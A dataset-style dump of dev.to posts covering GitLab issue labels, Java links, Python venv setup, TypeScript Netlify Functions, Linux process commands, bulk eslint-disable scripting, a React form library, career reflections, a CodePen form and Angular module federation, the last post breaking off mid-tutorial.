397,081 | Quick tips to enhance your gitlab issue workflow, part one | This post is originally posted on i-Logs blog and in my Collected Notes. When Emmanuel Bergmans and... | 0 | 2020-07-14T11:52:24 | https://dev.to/gwelr/quick-tips-to-enhance-your-gitlab-issue-workflow-part-one-1o2o | gitlab, workflow, beginners, methodology | <small>*This post is originally posted on [i-Logs blog](https://i-logs.com/blog/quick-tips-to-enhance-your-gitlab-issue-workflow-part-one/) and in my [Collected Notes](https://collectednotes.com/gwelr/quick-tips-to-enhance-your-gitlab-issue-workflow-part-one)*.</small>
When [Emmanuel Bergmans](https://www.linkedin.com/in/ilogs) and myself started i-Logs back in 2009, we were using a simple workflow based on [Subversion](https://subversion.apache.org/) (now Apache Subversion) and [Mantis](https://www.mantisbt.org). In 2016, we moved all our projects from subversion to git, the new kid on the block. At the same time, we adopted [Gitlab CE](https://gitlab.com/gitlab-org/gitlab-ce/) as our end-to-end software development platform. We use Gitlab for version control, source hosting, issue tracking, code review and continuous integration. That was the main reason we adopted Gitlab (and git) over subversion: it provides us with an integrated tool for managing sources and all the development activities in one single place. How convenient is that?
The purpose of this post is to introduce quick tips we have adopted to customized the [Gitlab CE issue tracker](https://docs.gitlab.com/ce/user/project/issues/) to our needs. Initially, this article is written for our clients as a kind of public documentation of our internal processes but we sincerely hope you'll find something useful if you are also using Gitlab. We are currently using Gitlab 12, so all the tips presented in this post refer to features available in that version.
We assume you have an access to a gitlab instance and you have at least a minimal knowledge of the features provided.
In this post, we will cover the following topics:
* how to define and use label categories
* how to define and use group labels
* how to define and use star labels
This post is the first instalment of a series of two. In a later post, we will cover how we are dealing with the issue board which is an important part of our daily workflow.
A side note: Gitlab uses the *Issue* metaphor but we, at i-logs, usually talk about change requests. We believe that the word "issue" has a negative connotation and that not every change request is, well, an issue per se. Through this document, we will preferably use the term change request although in Gitlab, it is called an issue.
## Categorize labels
For one of our client, we have an average of 300 open change requests distributed on four different projects. Using label categories help us sorting these change requests more efficiently. We have identified the following categories: priority, pile, type, environment and velocity. To illustrate our point, we will focus on the first three.
**Priority** labels define which change requests matter the most in terms of attention. To keep it simple, we have three different priorities: low, medium and high. *Low* change requests are the one we will eventually handle someday. *High* change requests on the other hand requires an immediate attention. Most of the change request are labelled as Medium.
**Piles** defines the current state of a change request. It is immediately related to the board feature of gitlab (more on this in our next installment covering the use of the development board).
We also recognize 4 different **types** of change requests: new features, small enhancements, bugs and questions. A new feature is an important change, either in terms of the amount of code required or of changes to the user experience. An enhancement represents a small change or a minor improvement. We are talking about a bug when a functionality of the software does not work as expected. We apply the question label when the request does not imply a change in the functionalities of the software.
Label categories is not a feature provided by Gitlab out of the box. The good news is that you can name your label exactly the way you want. Practically speaking, we define a label category by using a common prefix to all labels belonging to the same category. Prefix are separated from the label name by a colon. The label itself is written in capital letters.

*Example: priority labels*
Try to choose a short but meaningful name for the prefix in order to avoid long label names. For instance, we use the `pri:` prefix for priority, so we have the following labels defined for priority: `pri:HIGH`, `pri:MEDIUM`, `pri:LOW`. We use the `type:` prefix for the type label category, which includes `type:ADD` for new features, `type:ENH` for enhancements, `type:BUG` for bugs and `type:QUE` for questions. We use `pile:` for, well… the pile one, `vel:` for velocity, `env:` for environment, and so on.
## When to use label categories?
Label categories are useful when one:
* defines a new change request,
* reviews an existing change request,
* searches for specific change requests.
When **adding a new change request** to a project's issue tracker, label categories help us improve the definition of the change request. As mentioned above, we have a total of 5 different categories, and we want one and only one label from each category added to the change request as a kind of meta-data. It means that for each change request, we have to specify its priority, its type, its velocity, its state and the impacted environment. Note that the pile remains undefined at this point; it will be set when the change requests are sorted.
Because the Gitlab issue tracker is both powerful and flexible, we can easily follow this "one mandatory label per category" convention. Unfortunately, and to the best of our knowledge, there is no way to make the rule mandatory in Gitlab itself. In the end, it is really a matter of internal process and self-discipline.
Using label categories will also push you to use the same scheme everywhere. If, like us, you deal with several projects, always using the same label category scheme helps build efficient habits. Adding a new change request? Done with its description? Specify its type, pri, env, vel and you are good to go.
When **reviewing a change request**, the meta-data and the pile help us understand almost immediately what kind of change request we are looking at. That's another added value of using label categories. Take the below example:

*A properly defined change request*
Just by looking at the above list of labels, you know the change request is a bug (type) severely impacting (priority) the production environment (environment). The fix for that bug is estimated to be an easy one (velocity) and is currently ready to be tested (pile). By always using the same categories and labels, we create a habit for both our customers and for us.
The last advantage of using label categories comes when **searching for change requests**. Here are a few examples, using the search bar of the issue list:
* Wanna know which change requests require your immediate attention? Go to the Issue list and use the following filters: `type:BUG`, `env:PROD`, `pri:HIGH` …
* Your customer is running out of budget and wants a release with quick wins (also known as cheap change requests with great benefits)? Use the following filter: `type:ENH`, `type:ADD`, `vel:1`, `vel:2`
* etc

*Issue list filtered for urgent matters*
## Make use of group labels
If you have several projects hosted under a single instance of Gitlab CE, we strongly advise you to use [project groups](https://docs.gitlab.com/ce/user/group). Project groups can be seen as a common namespace for projects and team members. Among other things, this feature allows you to group projects (obviously), manage user access, and have a consolidated view on activities, merge requests and issues.
By default, each project has its own set of labels. If you have several projects, you have to define labels within each project. This can be a cumbersome, error-prone and time-consuming task, particularly if you use the same set of labels among the different projects. For instance, we, at i-Logs, have a default set of 24 labels (see above) and currently around 20 active projects. Do the maths and you'll get the picture.
> *Defined once, used everywhere*
One of the convenient things about project groups is that they allow you to define group labels, which are then automatically available in each project belonging to the group.
To define a label at the group level:
1. select Groups from the top-level menu;
1. select a group;
1. in the left-side menu, select the Issues entry and then the Labels entry;
1. from the (empty) list, click the create label button at the top-right corner of the screen.
If you already have a label created at the project level, you should be familiar with the group *New Label* form as they are identical.
The first advantage of a group label is that it is automatically available in all child projects. Time saved!

*Group labels in a project label list*
This is not the only advantage. Within a project, you can use a group label exactly like a label created directly in the project. But there is more: you can also use the group label on the group's consolidated information. For instance, you can filter the consolidated list of issues in a group of projects with one or more group labels. Also, you can subscribe to a group label to receive an email notification when a new change request is added to the Issue list of any project belonging to the group. Imagine having four projects in a group and the `type:BUG` label defined at the group level. If you subscribe to that label, you'll receive a notification email for each bug filed in any of the four projects.
To receive notifications for a specific label, simply go to the list of labels and click on the *subscribe* button to the right of the corresponding label. This is valid for both group and project labels.
A few words of advice on project groups:
* you should carefully think about your global project organization before starting, because although GitLab makes it possible to move groups and/or projects, doing so can have unwanted side effects.
* choose your label names carefully. At the project level, GitLab does not let you create two labels with the same name. Nevertheless, you can create a label at the group level with the same name as an existing label at the project level. You'll end up with duplicate label names in that project, which can lead to confusion.
## Use Star labels
In each project, from the label list view (Issues -> Labels), you can star one or more existing labels. Starring a label makes it a priority label. From the prioritized labels list, it is possible to reorder the labels to change their relative priority.

*Priority labels are stars!*
At i-Logs, we star all the labels from the `pri:` (priority) category. Once starred, we order the labels from HIGH to LOW. This little trick is very convenient when ordering the issue list by priority.

*Order the change request list by priority*
Please note that although it is possible, in a project label list, to star a label defined at the group level, at the time of writing this post it is not (yet?) possible to star a label at the group level.
That's it for today. I really do hope you have learned something interesting. If you have some GitLab magic tips to share, do not hesitate to comment below! I'll be glad to hear from you. For my part, I'll be back shortly with another post covering how we deal with the issue board on a daily basis. Stay tuned!
| gwelr |
398,534 | Wednesday Links - Edition 2020-07-15 | First milestone of Reactor 2020.0 -Codename Europium ( 5 min read ) ☢️ https://spring.io/blog/2020/07... | 6,965 | 2020-07-15T10:06:06 | https://dev.to/0xkkocel/wednesday-links-edition-2020-07-15-5gcd | java, spring, jvm, maven | First milestone of Reactor 2020.0 -Codename Europium ( 5 min read ) ☢️
https://spring.io/blog/2020/07/10/first-milestone-of-reactor-2020-0-codename-europium
The Spring team wants to hear from you! ( 40 sec read ) 🎤
https://spring.io/blog/2020/07/14/the-spring-team-wants-to-hear-from-you
APM headers in Kafka records ( 20 sec read ) 🐦
https://twitter.com/criccomini/status/1281632338128932864
Quick tip: ISO 8601 durations in Java ( 1 min read ) ⌛
https://www.mscharhag.com/java/iso8601-durations
Generating UUIDs at scale on the Web ( 12 min read ) 🆔
https://medium.com/teads-engineering/generating-uuids-at-scale-on-the-web-2877f529d2a2
Java Agent - Bond or Smith? ( 7 min read ) 🕵️
https://zserge.com/posts/javaagent/
ZGC and Using -XX:SoftMaxHeapSize ( 4 min read ) 🥞
https://malloc.se/blog/zgc-softmaxheapsize
Trying Rootless Docker with Testcontainers ( 8 min read ) 🛳️
https://bsideup.github.io/posts/rootless_docker/
Reposilite - Lightweight repository manager for Maven artifacts ( 30 sec read ) 📦
https://reposilite.com/
The Concept of Domain-Driven Design Explained ( 8 min read ) 🏢
https://dev.to/microtica/the-concept-of-domain-driven-design-explained-1ccn
What is difference between Heap and Stack Memory in Java JVM ( 6 min read ) 🧠
https://www.java67.com/2016/10/difference-between-heap-and-stack-memory-in-java-JVM.html
How to track and display profile views on GitHub ( 3 min read ) 🏷️
https://rushter.com/blog/github-profile-markdown/
Building stackoverflow-cli with Java 11, Micronaut, Picocli, and GraalVM ( 14 min read ) 📺
https://e.printstacktrace.blog/building-stackoverflow-cli-with-java-11-micronaut-picocli-and-graalvm/
| 0xkkocel |
399,506 | Starting a Python project | $ mkdir ~/my_project Create project directory under user home. $ cd ~/my_project $ git init Create... | 0 | 2020-07-16T01:07:13 | https://dev.to/kennethloh/starting-a-python-project-3eb5 | 1. `$ mkdir ~/my_project` Create project directory under user home.
2. `$ cd ~/my_project`
3. `$ git init` Create git repo.
4. `$ python -m venv venv` Create virtual environment within the project directory. Preferred over a centralised virtual environments directory e.g. `my_venvs/my_project` as it is easier to find and manage. Not a hidden directory e.g. `.venv` for visibility.
5. `$ source venv/bin/activate`
5a. `$ source venv/Scripts/activate` on Windows (the `venv` layout there uses `Scripts/` instead of `bin/`)
6. `$ pip install pip --upgrade` Because for some reason the virtual environment's pip is an older version?! Hints of Python dependency hell emerging. | kennethloh | |
403,126 | TypeScript and Netlify Functions | Did you know that Netlify Functions are just using AWS Lambdas behind the scenes? This means you can... | 0 | 2020-07-18T13:25:17 | https://chiubaca.com/typescript-and-netlify-functions-37b8 | typescript, netlify, serverless | Did you know that Netlify Functions are just using AWS Lambdas behind the scenes?
This means you can use the same type definitions available for aws-lambda for your Netlify functions too. Install the aws-lambda types by running the following.
```bash
npm install @types/aws-lambda --save-dev
```
You then only need to import the `APIGatewayProxyEvent` and `APIGatewayProxyCallback` types, like so.
```ts
import { APIGatewayProxyEvent, APIGatewayProxyCallback } from "aws-lambda";
export const handler = async function (
event: APIGatewayProxyEvent,
context: any,
callback: APIGatewayProxyCallback
) {
// Do some stuff here
};
```
Note, there are no type declarations available for `context` as this includes properties and methods specific to Netlify such as [Netlify Identity](https://docs.netlify.com/functions/functions-and-identity/#access-identity-info-via-clientcontext) .
However, having auto completion for `event` alone makes this hugely useful!
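To make that concrete, here is a small typed handler sketch. To keep the snippet self-contained, the type aliases below only mirror the relevant parts of `@types/aws-lambda`; in a real function you would import `APIGatewayProxyEvent` and `APIGatewayProxyResult` from `aws-lambda` instead:

```typescript
// Minimal aliases mirroring the relevant parts of @types/aws-lambda.
// Real code: import { APIGatewayProxyEvent, APIGatewayProxyResult } from "aws-lambda";
type APIGatewayProxyEvent = {
  httpMethod: string;
  queryStringParameters: Record<string, string> | null;
};
type APIGatewayProxyResult = { statusCode: number; body: string };

// The compiler now checks every property access on `event` for us.
export const handler = async (
  event: APIGatewayProxyEvent
): Promise<APIGatewayProxyResult> => {
  // `name` is just an illustrative query parameter for this sketch.
  const name = event.queryStringParameters?.name ?? "world";
  return {
    statusCode: 200,
    body: JSON.stringify({ message: `Hello, ${name}!` }),
  };
};
```

Returning a promise of a result object this way works with async handlers, and tends to be easier to type than the callback style.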
I'm putting together some TypeScript Netlify Functions examples over at this [repo](https://github.com/chiubaca/typescript-netlify-functions-starter). Feel free to give it a star if you find it helpful. | chiubaca |
403,332 | Animatronics with Artificial Intelligence — Brings Unimaginable Results | Have you ever heard of Animatronics? It is the integration of Animation and Electronics. Imagine what... | 0 | 2020-07-18T18:20:37 | https://dev.to/ritheeshbaradwaj/animatronics-with-artificial-intelligence-brings-unimaginable-results-1b70 | machinelearning, writing | Have you ever heard of Animatronics? It is the integration of Animation and Electronics. Imagine what wonders we could achieve with Artificial Intelligence with Animatronics working together. Here's an article that gives a gist of the possibilities we can have access to in case we use it with AI. Hope you enjoy it!
https://towardsdatascience.com/animatronics-with-artificial-intelligence-brings-unimaginable-results-407983acf39 | ritheeshbaradwaj |
421,321 | All about processes and how can we view them | Linux is a multitasking operating system, which means that it creates an illusion that multiple progr... | 6,412 | 2020-08-08T12:22:03 | https://dev.to/yashsugandh/all-about-processes-and-how-can-we-view-them-1n2i | ubuntu, linux, computerscience, beginners | Linux is a multitasking operating system, which means that it creates an illusion that multiple programs are running at the same time by rapidly switching from one program to another.
The Linux kernel manages this through the use of processes.
Each process has the illusion that it is the only process on the computer. The tasks share common processing resources (like CPU and memory).
What exactly is a process?
An instance of a program is called a process. A process can simply be described as a program in execution.
Every time we run a shell command, a program is run and a process is created for it.
Each process in Linux is assigned an ID called process id (PID).
There are two types of processes :
1. Foreground Processes
The foreground processes are those which can be seen in the UI and require some sort of user input.
For example, a text editor.
2. Background Processes
The background processes are those which do not require any form of input from the user and run automatically in the background.
For example, an antivirus.
There are different state of a process:
1. Running - The process is either running or ready to run (waiting for CPU time).
2. Interruptible - A blocked state in which the process waits for an event or a signal from another process.
3. Uninterruptible - A blocked state in which the process is waiting, typically on hardware or I/O, and cannot be woken by a signal until the wait completes.
4. Stopped - The process has been stopped, for example by a job-control signal (such as SIGSTOP, or Ctrl+Z in a terminal). It can be resumed later.
5. Zombie - The process has terminated, but its entry is still present in the process table. We get a zombie process when a child terminates but its parent has not yet read its exit status.
The first process that starts when a Linux system boots up is the **init process**.
The kernel looks for **init** in a few standard locations (such as `/sbin/init` and `/etc/init`). If the kernel can't find **init**, it tries to run `/bin/sh`, and if that also fails, the startup of the system fails.
The **PID** we talked about above is assigned to a process when it is created, and since **init** is the first process after the Linux system boots up, the PID of init is **1**.
Till now we have seen what process is and how it works. Now let's look at how to view the processes that are running in our system.
**1. `pidof` command**
The `pidof` command is used to find the process IDs of a running application.

To get the PID of a process we just use `pidof` along with the application name.

In the above example, we used the command `pidof init` which we know should return **1** and it did.
We also tried `pidof java` which returned multiple processes running for java.
**2. `ps` command**
The `ps` command returns the snapshot of the current processes.

In the above example, the `ps` command by default shows us all the processes that are associated with the current terminal.
TTY is short for “teletype,” and refers to the controlling terminal for the process.
Unix is showing its age here. The TIME field is the amount of CPU time consumed by the process.
To get the list of all the processes running we use the `ps` command along with two options `e` which specifies all processes and `f` which specifies full description.

In the above example, we used the command `ps -ef` to get the details of all the processes running.
What if we wanted to find a process id of a specific process?
- find the PID of firefox application

In the above example, we used the command `ps -ef | grep firefox` to get processes running for firefox so that we can get the PID of firefox.
But what if I told you there is a way that saves us from writing such a long command?
**3. `pgrep` command**
The `pgrep` command is used to get the process id of an application.
It is similar to the `pidof` command but much more powerful, as we do not need to provide the exact name of the application.

In the above example, we tried to find an application that has "idea" in its path.
When we tried it with `pidof` we got no response but when we tried the same with `pgrep` we got the PID.
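As a side note (this snippet is an illustration of mine, not one of the tools above), every process really is just a numeric entry under `/proc`, which is roughly what `pidof` and `pgrep` consult under the hood. A small Node.js/TypeScript sketch, Linux only:

```typescript
import { readdirSync, readFileSync } from "node:fs";

// Every numeric directory under /proc is a PID; /proc/<pid>/comm holds
// the command name of that process.
function listProcesses(): Array<{ pid: number; comm: string }> {
  const procs: Array<{ pid: number; comm: string }> = [];
  for (const entry of readdirSync("/proc")) {
    if (!/^\d+$/.test(entry)) continue;
    try {
      const comm = readFileSync(`/proc/${entry}/comm`, "utf8").trim();
      procs.push({ pid: Number(entry), comm });
    } catch {
      // The process may have exited between readdir and readFile; skip it.
    }
  }
  return procs;
}

// pgrep-style lookup: all PIDs whose command name matches a pattern.
function pgrepLike(pattern: RegExp): number[] {
  return listProcesses()
    .filter((p) => pattern.test(p.comm))
    .map((p) => p.pid);
}
```

With a Node process running, `pgrepLike(/^node/)` behaves much like `pgrep node`.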
**4. `top` command**
This utility tells the user about all the running processes on the Linux machine(It refreshes the data every 3 seconds by default).
The name top comes from the fact that the top program is used to see the “top” processes on the system.

In the above example, we can see the following
| Field | Description |
|--------- |--------------------------------------------- |
| PID | The process ID of each task |
| User | The username of task owner |
| PR | The scheduling priority of the task (lower values mean higher priority) |
| NI | The nice value of a task |
| VIRT | Virtual memory used (kb) |
| RES | Physical memory used (kb) |
| SHR | Shared memory used (kb) |
| %CPU | % of CPU time |
| %MEM | % of physical memory used |
| TIME+ | Total CPU time |
| Command | Command Name |
These were the tools we can use to view the processes. Please let me know if I missed something.
In the next post, we will discuss various ways to control processes. See you in the funny papers.
| yashsugandh |
696,340 | Adding eslint-disable to files with errors | Recently I needed to upgrade an Ember project that was on version 3.6 (quite outdated)... | 0 | 2021-05-12T18:56:45 | https://eduardoweiland.info/posts/2021/05/adicionando-eslint-disable-nos-arquivos-com-erros/ | braziliandevs, eslint, javascript | ---
title: Adding eslint-disable to files with errors
published: true
date: 2021-05-12 17:09:49 UTC
tags: [braziliandevs, eslint, javascript]
canonical_url: https://eduardoweiland.info/posts/2021/05/adicionando-eslint-disable-nos-arquivos-com-erros/
---
Recently I needed to upgrade an Ember project that was on version 3.6 (quite outdated) to version 3.24 (the current LTS). Anyone who knows Ember knows that a lot changed between these versions (Glimmer, native classes, etc.). And, along with these changes, Ember also updated its plugin for ESLint, including new rules to identify legacy code and reinforce the new best practices.
But even with so many changes, almost all of the old code still works (except where private APIs were used 🤷), thanks to [Semantic Versioning][]. It does *not* have to be updated to the new syntax for now; that will only be necessary when upgrading to Ember 4.0, once it is released.
Except that now ESLint is reporting errors in almost every file 😟!
Ember provides some [codemods][Ember Codemods] to help migrate code to the new syntax. The problem is that **not everything gets updated**. Some changes have to be made manually, which is not a very viable solution when there are 259 errors to be fixed by hand, even after running `eslint --fix` and the codemods 😱.
The solution: add `/* eslint-disable rule-name */` comments to every file that has errors, specifying only the rules that are violated in that file. This way, the old files won't report any errors, but all new code has to pass lint with the new rules 👌.
But doing this manually would still be a lot of work. There must be a way to automate it 🤔...
First of all, I needed ESLint output that would be easy to parse with other tools. The default format is good for humans to read, but not for machines. Fortunately, ESLint supports [several different formats][ESLint Formatters]. I chose the `compact` format because it reports each error on a single line, in a well-defined format from which it is easy to extract the necessary information (file path and rule name).
An example of an error reported in the `compact` format:
```
/home/eduardo/my-project/app/instance-initializers/global-loading-route.js: line 8, col 24, Error - Don't access `router:main` as it is a private API. Instead use the public 'router' service. (ember/no-private-routing-service)
```
It is easy to see that the line starts with the file path, followed by a colon, the line and column numbers, the error level and message, and ends with the rule name in parentheses. Translating this into a `sed`:
```sh
$ eslint -f compact . | sed -nr 's/^([^:]+).*\((.+)\)$/\1\t\2/p'
```
The result of this is a "cleaner" list, with only the file path and the name of the failing rule, separated by a tab. Since the same error can be reported more than once in the same file, it is important to add the `sort | uniq` pair:
```sh
$ eslint -f compact . | sed -nr 's/^([^:]+).*\((.+)\)$/\1\t\2/p' | sort | uniq
```
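As an aside, if you'd rather stay out of sed, the same parse step can be sketched in a few lines of TypeScript (purely illustrative; the regex is the same one used above):

```typescript
// Extract [filePath, ruleName] from one line of ESLint's `compact` output.
// Returns null for lines that don't match (e.g. the summary line).
function parseCompactLine(line: string): [file: string, rule: string] | null {
  const match = line.match(/^([^:]+).*\((.+)\)$/);
  return match ? [match[1], match[2]] : null;
}
```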
All that's left to do now is add the `/* eslint-disable */` comments to all the files. I could try to group all the rules and put a single comment at the top of each file, but 1) the comment could exceed the line length limit and cause new errors; 2) ESLint allows multiple separate comments, so there is no need to group them; and 3) it is easier to add one comment per rule, given the `compact` output format.
To do this, I piped the output of the command above into a `while read` loop and a sed that adds the comment at the top of the file. The command ended up like this:
```sh
$ eslint -f compact . | sed -nr 's/^([^:]+).*\((.+)\)$/\1\t\2/p' \
| sort | uniq | while IFS=$'\t' read file rule ; do \
sed -i "1s;^;/* eslint-disable $rule */\n;" "$file" ; done
```
In this command, `IFS=$'\t'` makes `read` split fields only on tabs and not on spaces, so even if there is a space in the file path it will be read correctly. `read file rule` reads one line from standard input (which is the output of `uniq`), putting the file name in the `$file` variable and the rule name in the `$rule` variable. These variables are then used in the `sed`, which edits the file by inserting a new line with the comment `/* eslint-disable $rule */`.
The result after that: zero failures! 😎
[Semantic Versioning]: https://semver.org/
[Ember Codemods]: https://github.com/ember-codemods
[ESLint Formatters]: https://eslint.org/docs/user-guide/formatters/
| eduardoweiland |
429,425 | Last Form component you need | I have published my first NPM library for React Form, I have created this form component in my last 3... | 0 | 2020-08-16T19:45:46 | https://dev.to/gkhan205/published-first-npm-package-for-react-form-58eb | react, npm, showdev, codewithghazi | I have published my first npm library for React forms. I built this form component over my last 3 years of experience, have tested it in more than 8 projects, and found it very useful.
There were times when creating form layouts, handling validations, building data for API POST requests, and populating form data from the server took quite a bit of time to incorporate into an application. So with every project I worked on, I improved this component and reached a level where I found it very useful and saved a lot of time on form development in all the aspects mentioned above.
It saves me approximately a day's work on forms in React apps.
After testing this component in my previous projects, I thought of creating an npm library for it so that it can be helpful to other developers too.
[Formify React](https://www.npmjs.com/package/formify-react)
Please try it out and give your feedback. Also, star this repo: [Formify React GitHub](https://github.com/gkhan205/formify-react)
[](https://codesandbox.io/s/formify-react-v9pkv?fontsize=14&hidenavigation=1&theme=dark) | gkhan205 |
492,181 | Why I Decided to Study Software Engineering | Why did I decide to learn software engineering? The short and cliche answer is: Balance. I consi... | 0 | 2020-10-19T18:47:12 | https://dev.to/nicklevenson/why-i-decided-to-study-software-engineering-40li | student, flatiron, codenewbie, career |
Why did I decide to learn software engineering? The short and cliche answer is:
*Balance*.

I consider myself to have a creative heart. Since I was little I have loved project oriented hobbies. As a kid I was obsessed with medieval weaponry, trying to build a trebuchet or crossbow out of household items. Running the constant risk of getting parentally scolded, I frequently took apart my RC cars that I had just got for my birthdays, just to try to put it back together. This habit usually ended with a non-functional piece of junk, but I loved the way it felt when I got something to work.
As I got older, my creative energy shifted from mechanical to more artistic and expressive. I learned to play and record music, which is still one of my favorite ways to spend time. Similar to building household gizmos as a kid, finishing a song and having people listen and enjoy gives me an immense feeling of accomplishment, satisfaction, and fulfillment. I made this, and it's mine. While attending college I studied film, philosophy, and music. After graduating I worked in television, but I found the work to be less fulfilling and less creative as I had expected in school. It was an exciting industry to be a part of, but I couldn't shake the feeling that something was missing. Then, the COVID pandemic hit, the industry was on pause, and I had a moment to sit back and reevaluate my life's direction.
*I looked to the things I loved and extracted the qualities that made them lovable.*
Film and music were expressive and more abstract, while philosophy was logical. With time to reflect, I realized that I needed a career that was creative and that *balanced* my logical and abstract qualities. I had taken a couple coding classes in college and was always interested in learning more. So during the start of the pandemic I decided to learn on my own. As it turned out, programming was exactly what I was looking for. It felt like a perfect *balance* of problem solving and abstract creative thinking. Couple that with intense feelings of euphoria during those 'aha' moments in figuring something out and making something work, I knew programming was something I had to pursue seriously. A few months later and I find myself beginning Flatiron School's full time software engineering program. I know this journey will be extremely challenging, but I am beyond excited to delve into the world and career of programming.
| nicklevenson |
603,410 | Daily Developer Jokes - Sunday, Feb 14, 2021 | Check out today's daily developer joke! (a project by Fred Adams at xtrp.io) | 4,070 | 2021-02-14T13:00:23 | https://dev.to/dailydeveloperjokes/daily-developer-jokes-sunday-feb-14-2021-9b3 | jokes, dailydeveloperjokes | ---
title: "Daily Developer Jokes - Sunday, Feb 14, 2021"
description: "Check out today's daily developer joke! (a project by Fred Adams at xtrp.io)"
series: "Daily Developer Jokes"
cover_image: "https://private.xtrp.io/projects/DailyDeveloperJokes/thumbnail_generator/?date=Sunday%2C%20Feb%2014%2C%202021"
published: true
tags: #jokes, #dailydeveloperjokes
---
Generated by Daily Developer Jokes, a project by [Fred Adams](https://xtrp.io/) ([@xtrp](https://dev.to/xtrp) on DEV)
___Read about Daily Developer Jokes on [this blog post](https://xtrp.io/blog/2020/01/12/daily-jokes-bot-release/), and check out the [Daily Developer Jokes Website](https://dailydeveloperjokes.github.io/).___
### Today's Joke is...

---
*Have a joke idea for a future post? Email ___[xtrp@xtrp.io](mailto:xtrp@xtrp.io)___ with your suggestions!*
*This joke comes from [Dad-Jokes GitHub Repo by Wes Bos](https://github.com/wesbos/dad-jokes) (thank you!), whose owner has given me permission to use this joke with credit.*
<!--
Joke text:
___Q:___ Why couldn't the React component understand the joke?
___A:___ Because it didn't get the context.
-->
| dailydeveloperjokes |
641,426 | How do I become a DevOps engineer? | A question I hear a lot is “How do I become a DevOps engineer?” I have two answers to this... | 0 | 2021-03-22T09:27:33 | https://jhall.io/archive/2021/03/21/how-do-i-become-a-devops-engineer/ | devops | ---
title: How do I become a DevOps engineer?
published: true
date: 2021-03-21 00:00:00 UTC
tags: devops
canonical_url: https://jhall.io/archive/2021/03/21/how-do-i-become-a-devops-engineer/
---
A question I hear a lot is “How do I become a DevOps engineer?”
I have two answers to this question.
The first probably isn’t very satisfying:
**“DevOps Engineer” is an oxymoron.**
DevOps, as a philosophy, is the idea that Development and Operations should work together, in [cooperation](https://jhall.io/archive/2021/02/11/devops-is-just-cooperation/).
My second answer addresses what I expect most people mean by the question: How can a developer adopt a more DevOps mindset, and possibly even move into operations?
The shortest answer I can offer to this question is: **Learn to ship your own code.**
To elaborate a bit on that: “DevOps” is about the full application lifecycle, so if you want to improve your DevOps skills, learn to operate in all stages of that lifecycle, not just coding. That means learning to ship your own code, learning to deploy your own code, learning to monitor your own code. | jhall |
660,872 | How to Create Subscribe Call to action Form | For the last few days, I've been working on a Some Design parts. I've always believed that a creativi... | 0 | 2021-04-10T06:12:22 | https://dev.to/itanand/how-to-create-subscribe-call-to-action-form-4pim | codepen | For the last few days, I've been working on some design pieces. I've always believed that creativity is important for any dev, since it connects you to future opportunities and helps you grow your network.
Today I created a subscribe call-to-action design using Pug, SCSS, and JavaScript (Babel). There's still some stuff to improve, like making it more creative, tweaking some UX, etc. So it's still a WIP, for sure. But hey, everyone has to start somewhere, right?
I used CodePen to write my code. What is CodePen? CodePen is a social development environment for front-end designers and developers. It basically helps you build and deploy a website, show off your work, build test cases to learn from, and much more. If you want to know more about CodePen, visit codepen.io.
Let's start with today's hot topic: how to create a subscribe call-to-action page. I have shared the link to my code below; you can follow it to get the source code.
I used Pug, SCSS, and JavaScript (Babel) to create this design.
https://codepen.io/itanand/pen/dyNJRva | itanand |
704,282 | Angular dynamic modules at runtime with Module Federation | Angular 12 recently launched with the added enhancements of Webpack 5 and opening the door to using m... | 0 | 2021-05-20T21:54:34 | https://dev.to/seanperkins/angular-dynamic-modules-at-runtime-with-module-federation-mk5 | angular, webpack, modulefederation, microfrontend | Angular 12 recently launched with the added enhancements of Webpack 5 and opening the door to using module federation. If you are looking for a great deep-dive into module federation and micro-frontends, I suggest reading: https://www.angulararchitects.io/aktuelles/the-microfrontend-revolution-module-federation-in-webpack-5/.
## Micro frontends
Micro frontends, and more importantly module federation, allow developers to remotely request a module over the network and bootstrap it into their application. Similar to lazy loading, remotely loading modules can greatly reduce the bundle size of your application and the network cost of loading modules that end up unused by your users.
There's other benefits to micro-frontends, including:
- A/B serving features
- Incremental updates
- Independent versioning of features
- Dynamic feature resolutions
---
## Getting started
The Angular Architects package `@angular-architects/module-federation` creates a simple API to request modules and pull them into your application.
Assuming an NX mono-repo set-up:
To add module federation to your workspace, run:
```
nx add @angular-architects/module-federation@next
```
This will install the necessary dependency, with the schematics needed to add remote apps to be consumed by module federation.
Let's assume you have the following mono-repo:
```
apps/
shell/
remote/
```
**Shell** is your consuming application. It is the highest container, responsible for what pieces are pulled in and the composition of features.
**Remote** is the feature set, isolated and decoupled to be pulled in on-demand, by the shell.
To make these apps compatible with module federation, you will need to run the schematic on their projects:
```
nx add @angular-architects/module-federation --project shell --port 5000
nx add @angular-architects/module-federation --project remote --port 6000
```
You can configure the port to be whatever you desire. This only matters for local development.
This schematic will:
- Generate a `webpack.config.js` and `webpack.config.prod.js` with a boilerplate for module federation
- Update `angular.json` for the project definition, to reference the `extraWebpackConfig` and update the project's port to the value specified
- Split the bootstrap logic of your app from `main.ts` to `bootstrap.ts` and reference the function in `main.ts`.
### Module Federation Plugin
Inside your `webpack.config.js` you will want to get accommodated with the config for module federation.
```js
module.exports = {
output: {
uniqueName: 'remote',
publicPath: 'auto',
},
optimization: {
runtimeChunk: false,
},
resolve: {
alias: {
...sharedMappings.getAliases(),
},
},
plugins: [
new ModuleFederationPlugin({
name: 'remote',
filename: 'remoteEntry.js',
exposes: {
'./Module':
'./apps/remote/src/app/app.module.ts',
},
shared: {
'@angular/core': {
singleton: true,
strictVersion: true,
requiredVersion: '>= 12.0.0',
},
'@angular/common': {
singleton: true,
strictVersion: true,
requiredVersion: '>= 12.0.0',
},
'@angular/common/http': {
singleton: true,
strictVersion: true,
requiredVersion: '>= 12.0.0',
},
'@angular/router': {
singleton: true,
strictVersion: true,
requiredVersion: '>= 12.0.0',
},
...sharedMappings.getDescriptors(),
},
}),
sharedMappings.getPlugin(),
],
};
```
- `name` should align with your `output.uniqueName` and match your shell app's webpack config for the remotes section.
- `filename` is the name of the generated entry-point file for your remote module. This file will not be renamed during the build and is the asset you will reference in your shell to request the module.
- `exposes` is the named paths to modules, components, etc. that you want to make accessible to the shell to pull in. I'll explain this further below.
- `shared` is the set of shared dependencies (and rules) between your remote and shell app. This gives you tight control so that your remote doesn't re-declare modules/services you expect to be singletons, and prevents mismatched versions of Angular or other libraries from existing in the ecosystem. By setting `strictVersion` to `true`, the build will fail fast if an issue occurs. Removing this option will potentially let the build pass, but display warnings in the dev console.
You can now locally run your shell and remote with:
```
nx serve shell -o
nx serve remote -o
```
> `-o` will automatically launch the apps in your default browser
### Exposes (continued)
